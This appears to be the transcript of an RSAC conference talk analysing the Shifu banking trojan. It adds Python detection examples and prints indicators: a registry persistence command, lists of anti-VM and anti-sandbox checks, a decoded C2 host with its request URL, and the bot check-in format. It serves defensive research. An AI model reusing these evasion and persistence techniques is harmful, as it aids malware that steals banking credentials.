TRANSCRIPT
SESSION ID: TTA1-F01
#RSAC
Cybercrime Collaboration - The Changing APAC Threat Landscape
Tal Darsan, Threat Research Team Leader, IBM Security
Etay Maor, Executive Security Advisor, IBM Security
Agenda
Intro – collaboration and localization
Deep dive into Shifu
The dark web
What do we do next?
It’s Not Just About Bank Accounts and Card Data
Cybercriminals are always looking for other ways to monetize
Example - Healthcare:
Seller:
Easier to steal
More profitable than a credit card
Buyer:
Harder to detect
Many opportunities
Localizing malware to APAC
Choosing specific targets
Local malvertising or spamming services
Knowledge of internal procedures of local entities
Localized content using language
Localized injections using injection shops
Local money mules
Shifu trojan introduction
Introduced by IBM Security / Trusteer in August 2015
Active in the wild since mid 2015
Initially focused on Japan, then on Eastern European financial institutions
Shares code portions with Shiz and Zeus
Shares characteristics with Gozi and Dridex
Main features
Domain generation algorithm
Theft from bank apps
Anti research
Stealth
Webinjects configurations
Wipe system restore
Main features (cont.)
Anti-research: detection of VM and sandbox tools
Browser hooking and web injects parser
Keylogger
Bitcoin wallet stealer
Screenshot grabber
Certificate grabber
Endpoint classification and monitoring of applications of interest
RAT and bot control module
Shifu’s Infection Chain
Delivery (diagram label): Angler EK
1. Drops a copy of itself under %APPDATA% -> <payload's random name>.exe
2. Writes a Windows registry persistence entry:
   Key:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IntelPowerAgent{Decimal Number}
   Data: rundll32.exe shell32.dll,ShellExec_RunDLL <payload's random name>.exe
3. Drops an Apache server
4. Drops a financial web-injects configuration
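As an added defender-side example (not from the talk), the following Python flags autorun entries shaped like the persistence step above: a rundll32 shell32.dll,ShellExec_RunDLL proxy launch of a payload under %APPDATA% with an IntelPowerAgent{decimal} value name. The Run-key entries are constructed sample data, not real observations.

```python
import re

# Constructed sample of (value name, command) pairs, as an export of
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run would yield them.
SAMPLE_RUN_ENTRIES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("IntelPowerAgent31337", r"rundll32.exe shell32.dll,ShellExec_RunDLL C:\Users\alice\AppData\Roaming\kqzxv.exe"),
    ("IntelPowerAgent7", r"rundll32.exe shell32.dll, ShellExec_RunDLL %APPDATA%\a1b2c3.exe"),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
]

# The slide's persistence shape: rundll32 proxies the launch of the dropped
# payload through shell32's ShellExec_RunDLL export (space after the comma optional).
SHELLEXEC_PROXY = re.compile(
    r'^\s*"?rundll32(?:\.exe)?"?\s+shell32\.dll\s*,\s*ShellExec_RunDLL\s+(?P<target>.+?)\s*$',
    re.IGNORECASE,
)
# Value name used by this sample: IntelPowerAgent followed by a decimal number.
VALUE_NAME = re.compile(r"^IntelPowerAgent\d+$")
# Payload dropped under %APPDATA%, as the literal variable or its expanded path.
APPDATA_PATH = re.compile(r"(%APPDATA%|\\AppData\\Roaming)\\", re.IGNORECASE)

def classify_run_entry(name, command):
    """Return the indicators an autorun entry shares with the Shifu persistence entry.
    Each indicator is checked independently, so a renamed value or a different
    drop path still gives a partial match; an empty list means a clean entry."""
    reasons = []
    m = SHELLEXEC_PROXY.match(command)
    if m:
        reasons.append("rundll32 shell32.dll,ShellExec_RunDLL proxy launch")
        if APPDATA_PATH.search(m.group("target")):
            reasons.append("launch target lives under %APPDATA%")
    if VALUE_NAME.match(name):
        reasons.append("value name matches IntelPowerAgent{decimal}")
    return reasons

def find_suspicious(entries):
    """Map each flagged value name to its indicators, skipping clean entries."""
    flagged = {}
    for name, command in entries:
        reasons = classify_run_entry(name, command)
        if reasons:
            flagged[name] = reasons
    return flagged

if __name__ == "__main__":
    for name, reasons in find_suspicious(SAMPLE_RUN_ENTRIES).items():
        print(f"{name}: {'; '.join(reasons)}")
```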
Shifu main function
Deletes the Zone.Identifier mark that the OS places on a file downloaded from the Internet to record its origin
Records the bitness of the OS
Calls a function that compares CRC32 values to make sure a particular process is not present; if it is, execution stops
Checks for smart-card token presence to ensure its availability in order to operate correctly; if one is present, it passes the main “Anti Research” validation function
Calls further anti-research functions
Shifu’s Anti Research
Address          Stored CRC32   Process name
.data:0040B120   dd 278CDF58h   ; vmtoolsd.exe
.data:0040B124   dd 99DD4432h   ; vmwareuser.exe
.data:0040B12C   dd 6D3323D9h   ; vmusrvc.exe
.data:0040B130   dd 3BFFF885h   ; vmsrvc.exe
.data:0040B134   dd 64340DCEh   ; vboxservice.exe
.data:0040B138   dd 63C54474h   ; vboxtray.exe
.data:0040B13C   dd 2B05B17Dh   ; xenservice.exe
.data:0040B144   dd 77AE10F7h   ; wireshark.exe
.data:0040B148   dd 0CE7D304Eh  ; dumpcap.exe
.data:0040B158   dd 0E90ACC42h  ; idag.exe
.data:0040B15C   dd 4231F0ADh   ; sysanalyser.exe
.data:0040B160   dd 0D20981E0h  ; shift_hit.exe
.data:0040B174   dd 6AAAE60h    ; idaq.exe
.data:0040B178   dd 5BA9B1FEh   ; procmon.exe
.data:0040B17C   dd 3CE2BEF3h   ; regmon.exe
.data:0040B180   dd 0A945E459h  ; procexp.exe
.data:0040B184   dd 877A154Bh   ; peid.exe
.data:0040B188   dd 33495995h   ; autoruns.exe
.data:0040B194   dd 9305F80Dh   ; imul.exe
.data:0040B198   dd 0C4AAED42h  ; emul.exe
.data:0040B19C   dd 14078D5Bh   ; apispy.exe
.data:0040B1B0   dd 2AAA273Bh   ; joeboxserver.exe
.data:0040B1B4   dd 777BE06Ch   ; joeboxcontrol.exe
Shifu’s Anti Research (cont.)
1. Checks for the presence of the following DLLs among the loaded modules:
   • sbiedll.dll
   • dbghelp.dll
   • api_log.dll
   • dir_watch.dll
   • pstorec.dll
2. Checks for the presence of the following folders and files on disk:
   • c:\analysis\sandboxstarter.exe
   • c:\analysis
   • c:\insidetm
   • c:\windows\system32\drivers\vmmouse.sys
   • c:\windows\system32\drivers\vmhgfs.sys
   • c:\windows\system32\drivers\vboxmouse.sys
3. Uses the Windows API functions NetServerGetInfo and NetWkstaGetInfo to obtain the current machine's network group name and domain respectively, and compares them with the strings:
   • WORKGROUP
   • HOME
   If neither matches, checks whether the function output is within the alphanumeric character range and whether it contains the string ANALYSERS
4. Calls the function "CompNamePresentAndNotBlacklisted" to make sure the computer name does not include the following strings:
   • SANDBOX
   • FORTINET
Shifu’s Apache Server
1. Shifu downloads an archive file, server.zip, from its C2 server
2. server.zip contains an Apache server, which is deployed on the victim’s machine
Purposes:
- Decrypting the web-injects host and receiving injected JavaScript from a remote Shifu server
- Modular configuration component
- Innovative approach
Shifu’s Apache Server (cont.)
To decode the address of the remote webinjects server “secure.7375626a6563746472697665722e62697a.moz”, the local server performs a hex-to-text conversion. In this case:
7375626a6563746472697665722e62697a = subjectdriver.biz
It then replays the request to the C2 with the correct webinjects server:
subjectdriver.biz/?c=script&v=1&b=SECUSER!WIN7X86SP1!E78ACB41&r=[bank-injection-token]
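Added example, not part of the presentation: a small Python check that finds hostnames carrying a hex-encoded label, as in the webinjects address above, and recovers the real host so it can be matched in DNS or proxy logs. Apart from the slide's own value, the hostnames are constructed samples.

```python
import binascii
import re

# Constructed hostnames as they might appear in DNS or proxy logs; only the
# first is the slide's own value.
SAMPLE_HOSTS = [
    "secure.7375626a6563746472697665722e62697a.moz",
    "www.example.com",
    "cdn.7363726970742e696f.moz",
    "abc123.example.net",
]

# A label is a decode candidate when it is all hex and long enough that
# hex-only labels occurring by chance ("abc123", "deadbeef") are skipped.
HEX_LABEL = re.compile(r"^[0-9a-fA-F]{16,}$")

def decode_hex_label(label):
    """Hex-decode one DNS label; return text only if it looks like a domain name."""
    if len(label) % 2 or not HEX_LABEL.match(label):
        return None
    try:
        text = binascii.unhexlify(label).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Require a dotted name of valid label characters, as "subjectdriver.biz" is.
    if re.fullmatch(r"[a-z0-9-]+(\.[a-z0-9-]+)+", text, re.IGNORECASE):
        return text
    return None

def find_encoded_hosts(hostnames):
    """Return {observed hostname: decoded real host} for every host with an encoded label."""
    found = {}
    for host in hostnames:
        for label in host.split("."):
            decoded = decode_hex_label(label)
            if decoded:
                found[host] = decoded
                break
    return found

if __name__ == "__main__":
    for seen, real in find_encoded_hosts(SAMPLE_HOSTS).items():
        print(f"{seen} -> {real}")
```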
Communication
Check-in request format string:
botid=%s&ver=%s.%u&up=%u&os=%u&ltime=%s%d&token=%d&cn=%s&av=%s&dmn=%s
Some of Shifu’s known bot commands are:
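Added example, not from the talk: Python that triages constructed proxy-log lines for the two request shapes shown on these slides, the check-in carrying the full parameter set of the format string and the c=script web-inject fetch. It assumes the check-in travels as a URL query string and that the bot id splits as user!os!hexid; both are assumptions drawn from the single slide example, and every log value is made up.

```python
from urllib.parse import parse_qs, urlsplit

# Parameter names from the check-in format string on the slide, in order.
CHECKIN_KEYS = ("botid", "ver", "up", "os", "ltime", "token", "cn", "av", "dmn")

# Constructed proxy log lines, "<client> <method> <url>"; all values are made up.
SAMPLE_LOG = """\
10.0.0.12 GET http://www.example.com/index.html
10.0.0.12 POST http://203.0.113.7/?botid=SECUSER!WIN7X86SP1!E78ACB41&ver=1.21&up=3600&os=61&ltime=GMT2&token=1234&cn=SECWS01&av=Windows%20Defender&dmn=WORKGROUP
10.0.0.25 GET http://203.0.113.9/?c=script&v=1&b=SECUSER!WIN7X86SP1!E78ACB41&r=bank-token
10.0.0.31 GET http://www.example.org/?botid=1&ver=2
"""

def parse_bot_id(value):
    """Split a '<user>!<os>!<hexid>' bot id (field meanings are an assumption
    drawn from the single slide example SECUSER!WIN7X86SP1!E78ACB41)."""
    parts = value.split("!")
    if len(parts) != 3 or not parts[2].isalnum():
        return None
    return {"user": parts[0], "os": parts[1], "id": parts[2]}

def classify_request(url):
    """Return ('checkin' | 'inject' | None, bot id fields) for one URL."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    # Full check-in: every key of the format string is present (assumed sent as a query).
    if all(k in qs for k in CHECKIN_KEYS):
        return "checkin", parse_bot_id(qs["botid"][0])
    # Web-inject fetch: the c=script request replayed to the webinjects server.
    if qs.get("c") == ["script"] and "b" in qs and "r" in qs:
        return "inject", parse_bot_id(qs["b"][0])
    return None, None

def triage(log_text):
    """Return (client, kind, bot id fields) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        client, _method, url = line.split(" ", 2)
        kind, bot = classify_request(url)
        if kind:
            hits.append((client, kind, bot))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```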
Applications
MultiCash and MultiCash@Sign – An electronic banking platform that serves large corporations for the purpose of e-banking across the globe. MultiCash serves customers all across Europe. Shifu hunts for access credentials to the MultiCash@Sign plugin that banks enable their major customers to use.
Elba5 – An electronic banking platform vendor serving the Austrian market. Shifu hunts for Elba data that may be found on the infected machine.
HBP Hypo Office Banking – A platform that serves enterprise clients for the purpose of e-banking via multiple bank accounts. HBP serves the Austrian market. Shifu hunts for HBP customer profile data.
File inspection
• iexplore.exe
• opera.exe
• firefox.exe
• chrome.exe
• maxthon.exe
• java.exe
• javaw.exe
• plugin-container.exe
• acrobat.exe
• acrod32.exe
Diagram labels: URLDownloadToFile, HTTPS, SIGNED file.exe, infected.exx
Conclusions
Threat actors are reusing tools and techniques
They are using customization services to target specific regions
Cybercrime intelligence collection is not limited to anti-malware tools – processes and procedures are scrutinized
Malware is AV, research AND malware aware
Cybercrime skill gap compression!!!